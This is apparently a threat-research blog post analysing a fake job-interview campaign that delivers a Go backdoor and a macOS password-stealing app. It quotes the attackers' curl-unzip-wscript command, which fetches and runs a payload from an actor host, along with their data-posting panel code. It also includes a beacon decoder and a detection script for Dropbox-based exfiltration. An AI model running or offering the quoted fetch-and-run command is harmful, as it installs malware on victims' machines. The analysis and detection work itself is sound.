Golang backdoor with a side of ChromeUpdateAlert App

By: Jason Reaves and Joshua Platt

Several recent articles describe new malware that researchers associate with Contagious Interview[1,2] activity. The activity described[3,4] borrows tactics from recent cybercrime campaigns such as ClickFix[6]. According to posts on X (Twitter), the threat actors use messaging on sites such as LinkedIn to set up bogus interviews:

Ref: https://x.com/tayvano_/status/1872980013542457802

Once you start interacting with the site you are already inside threat actor (TA) infrastructure: the site is a NodeJS panel that throws a fake error message about the camera.

"className=\"text-red-400 font-semibold\">Access to your camera or microphone is currently blocked.</p>\r\n                <p className=\"text-gray-500 mt-2\">\r\n                  The camera discovery cache is experiencing a race condition. This may lead to inconsistent data.\r\n                  <a className = 'text-blue-500 mx-2 underline text-lg' href = {`${os == \"Windows\" ? 

The panel references Google Forms but also POSTs the collected form data to a TA-controlled endpoint:

"  const response = await axios.post('hxxps://api.nvidia-drive[.]cloud/submit', {...formData});\r\"

These sites tend to go down quickly, but at the time of writing a new one was live at:

app.quickvidintro.com/invite/advisor

Inside the panel code we can find multiple invite links:

{path:"/invite/halliday",element:(0,Ft.jsx)(Ci,{})},{path:"/invite/tforce",element:(0,Ft.jsx)(Li,{})},{path:"/invite/dep10mk",element:(0,Ft.jsx)(Ii,{})},{path:"/invite/wdl101",element:(0,Ft.jsx)(Gi,{})},{path:"/invite/deny01os",element:(0,Ft.jsx)(Bi,{})},{path:"/invite/ip8k001lk3",element:(0,Ft.jsx)(Vi,{})},{path:"/invite/ddk2fo013",element:(0,Ft.jsx)(sl,{})},{path:"/invite/Awe15pq",element:(0,Ft.jsx)(fi,{})},{path:"/invite/Awe15h2",element:(0,Ft.jsx)(yi,{})},{path:"/invite/Awe15h3",element:(0,Ft.jsx)(Uo,{})},{path:"/invite/Awe15h4",element:(0,Ft.jsx)($o,{})},{path:"/video-questions/create/owl92ufnm38048c3bb7261efd5kklp09",element:(0,Ft.jsx)(Os,{})},{path:"/video-questions/create/0893jflei910c41a4b4da92569330lm00",element:(0,Ft.jsx)(Cs,{})},{path:"/video-questions/create/wwo92mwpq4oe946d6904478f15d3e7iiw",

The panel also embeds a new download location for the zip, in the command the victim is told to run:

<Code>\r\n            curl -k -o \"%TEMP%\\nvidiaupdate.zip\" hxxps://api.camera-drive[.org/nvidia-al.update && powershell -Command \"Expand-Archive -Force -Path '%TEMP%\\nvidiaupdate.zip' -DestinationPath '%TEMP%\\nvidiadrive'\" && wscript \"%TEMP%\\nvidiadrive\\update.vbs\"\r\n          </Code>

Ultimately the script that is downloaded and run fetches a zip package containing multiple pieces of malware, among them a backdoor with stealer functionality that was recently discussed in a blog[3]. The only part that blog does not really cover is the C2 communications, which may not mean much given that the source code ships with the package. The beacon below skips a 16-byte prefix, takes the next 128 bytes as the RC4 key, and decrypts the remainder into space-separated fields (a plain hex id followed by base64 values):

>>> import base64, binascii
>>> from Crypto.Cipher import ARC4   # pycryptodome
>>> data = binascii.unhexlify('a873df0f8acfbbec510afe2b80fd972326fd8f98eb2b5f6dc8cd67fd97142b55cad448f4b663867bc7db5524601f5cb0985456c9bc18c1016040f14dfc234d37782857cef160912aad28f4e83969b1701651af0243b8dab5b7f49f567b36bf8bccd40e9a9e8b28527df6674ff7a9c8e62a716d526ce71de7d3956c3d4770ed801a033439608c9f0f7ccb3bd10f79e7af2edd42d9b265e7f6f98fe20b87bb66f7e74b86cb72bfe9fac5508457e47b308ca26b5701adc826b9b7df94dbedb0256fed8b439cdeb832a36384210672a760fff72f14c0d1132dce70be5e0af3c0a36e7ff2def63aa68ecc88a7')
>>> key = data[16:16+128]   # 128-byte RC4 key sits right after a 16-byte prefix
>>> rc4 = ARC4.new(key)
>>> t = rc4.decrypt(data[16+128:])   # everything after the key is the RC4 ciphertext
>>> t
b'14610ebd ZndlOQ== cm9vdA== QnJ1bm9zLVZpcnR1YWwtTWFjaGluZS5sb2NhbA== ZGFyd2lu YXJtNjQ= Mi4w'
>>> t = t.split(b' ')
>>> t = t[1:]   # drop the leading hex id; the remaining fields are base64
>>> [print(x) for x in map(base64.b64decode,t)]
b'fwe9'
b'root'
b'Brunos-Virtual-Machine.local'
b'darwin'
b'arm64'
b'2.0'
[None, None, None, None, None, None]
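The same beacon layout as a reusable decoder, added here as an example and not code from the post or the malware. It implements RC4 itself so it runs without pycryptodome; the 16-byte prefix, 128-byte key and field names are assumptions read off the captured message above.

```python
import base64
import binascii

# Layout seen in the session above; assumed fixed for every beacon: a 16-byte prefix the
# blog skips, a 128-byte RC4 key in the clear, then the RC4-encrypted field string.
PREFIX_LEN = 16
KEY_LEN = 128
# Field names are assumptions read off the decoded values (the id is plain hex, the rest base64).
FIELDS = ("id", "tag", "user", "host", "os", "arch", "version")

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA). One call both encrypts and decrypts; no pycryptodome needed."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def decode_beacon(blob: bytes) -> dict:
    """Split prefix / key / ciphertext, decrypt, and parse 'hexid b64 b64 ...' into named fields."""
    if len(blob) <= PREFIX_LEN + KEY_LEN:
        raise ValueError("blob too short for a 16-byte prefix, 128-byte key and payload")
    key = blob[PREFIX_LEN:PREFIX_LEN + KEY_LEN]
    parts = rc4(key, blob[PREFIX_LEN + KEY_LEN:]).split(b" ")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    int(parts[0], 16)  # the id must be plain hex; a wrong key or layout fails here, not later
    values = [parts[0].decode("ascii")]
    values += [base64.b64decode(p, validate=True).decode("utf-8") for p in parts[1:]]
    return dict(zip(FIELDS, values))

def encode_beacon(fields: dict, key: bytes, prefix: bytes = b"\x00" * PREFIX_LEN) -> bytes:
    """Inverse of decode_beacon; used only to build constructed test messages."""
    plain = [fields["id"].encode()] + [base64.b64encode(fields[f].encode()) for f in FIELDS[1:]]
    return prefix + key + rc4(key, b" ".join(plain))

if __name__ == "__main__":
    # The beacon captured on this page, hex copied from the session above.
    captured = binascii.unhexlify("a873df0f8acfbbec510afe2b80fd972326fd8f98eb2b5f6dc8cd67fd97142b55cad448f4b663867bc7db5524601f5cb0985456c9bc18c1016040f14dfc234d37782857cef160912aad28f4e83969b1701651af0243b8dab5b7f49f567b36bf8bccd40e9a9e8b28527df6674ff7a9c8e62a716d526ce71de7d3956c3d4770ed801a033439608c9f0f7ccb3bd10f79e7af2edd42d9b265e7f6f98fe20b87bb66f7e74b86cb72bfe9fac5508457e47b308ca26b5701adc826b9b7df94dbedb0256fed8b439cdeb832a36384210672a760fff72f14c0d1132dce70be5e0af3c0a36e7ff2def63aa68ecc88a7")
    print(decode_beacon(captured))
```

Because a malformed or wrongly-keyed message fails the field-count, hex-id or base64 checks, the decoder can be run across a capture without silently emitting garbage.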

Alert App

Shipping the malware as source code together with a compiler is an interesting tactic, possibly intended to bypass security solutions. Also included is a Mach-O file that the script detonates:

APP="ChromeUpdateAlert.app"

# Step 5: Run ChromeUpdateAlert.app
if [[ -d "$WORK_DIR/$APP" ]]; then
    open "$WORK_DIR/$APP" &
fi

The app was covered in the same blog, but I went through it more closely statically because it appears to use the Dropbox API[5] and has exfiltration functionality. It prompts for your password, something fairly common during software installation.

It also uses a refresh_token, client_id and client_secret hidden in the application to obtain a Bearer token for uploading files to the TA's Dropbox app:

The refresh_token used:

The other values are loaded dynamically:

With these values the app obtains a Bearer token and uses it with the Dropbox files API to upload the captured password to the TA-controlled Dropbox app.
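A static triage helper for the pattern just described, added here as an example rather than code from the post or the app: it scans a strings dump of a binary for embedded OAuth2 credential names alongside Dropbox's documented token-refresh and file-upload endpoints, and only flags the combination. The sample strings and the long-token heuristic are constructed assumptions.

```python
import re

# Added triage helper; not the app's or the blog's code. It scans a strings dump of a
# binary for the combination the blog describes: embedded OAuth2 credential names plus
# Dropbox's documented token-refresh and file-upload endpoints.
INDICATORS = {
    "oauth_token_endpoint": re.compile(r"api\.dropboxapi\.com/oauth2/token"),
    "upload_endpoint": re.compile(r"content\.dropboxapi\.com/2/files/upload"),
    "refresh_grant": re.compile(r"grant_type=refresh_token"),
    "credential_key": re.compile(r"\b(refresh_token|client_id|client_secret)\b"),
    "bearer_header": re.compile(r"Authorization:\s*Bearer", re.IGNORECASE),
}
# Heuristic (assumed) for a bare embedded token or secret: a long unbroken base64/URL-safe run.
TOKEN_LIKE = re.compile(r"^[A-Za-z0-9_.\-]{40,}$")

def triage_dropbox_exfil(strings):
    """Classify indicator hits and decide whether the refresh-token-to-upload pattern is present."""
    hits = {name: [] for name in INDICATORS}
    hits["token_like"] = []
    for raw in strings:
        s = raw.strip()
        for name, rx in INDICATORS.items():
            if rx.search(s):
                hits[name].append(s)
        if TOKEN_LIKE.match(s):
            hits["token_like"].append(s)
    # Verdict needs all three legs: credential names, the token endpoint and the upload endpoint.
    pattern = all(hits[k] for k in ("credential_key", "oauth_token_endpoint", "upload_endpoint"))
    return {"hits": hits, "refresh_upload_pattern": pattern}

# Constructed strings dump shaped like what the blog describes (not from the real sample).
SAMPLE_STRINGS = [
    "https://api.dropboxapi.com/oauth2/token",
    "grant_type=refresh_token&refresh_token=%s&client_id=%s&client_secret=%s",
    "https://content.dropboxapi.com/2/files/upload",
    "Authorization: Bearer ",
    "Dropbox-API-Arg",
    "Enter your password to update Google Chrome",
    "CONSTRUCTED_REFRESH_TOKEN_" + "x" * 40,
]

if __name__ == "__main__":
    print(triage_dropbox_exfil(SAMPLE_STRINGS))
```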

IOCs

References

1: https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/

2: https://www.group-ib.com/blog/apt-lazarus-python-scripts/

3: https://dmpdump.github.io/posts/NorthKorea_Backdoor_Stealer/

4: https://x.com/tayvano_/status/1872980013542457802

5: https://www.dropbox.com/developers/documentation/http/documentation#oauth2-token

6: https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape

Golang backdoor with a side of ChromeUpdateAlert App was originally published in Walmart Global Tech Blog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Article Link: Golang backdoor with a side of ChromeUpdateAlert App | by Jason Reaves | Walmart Global Tech Blog | Mar, 2025 | Medium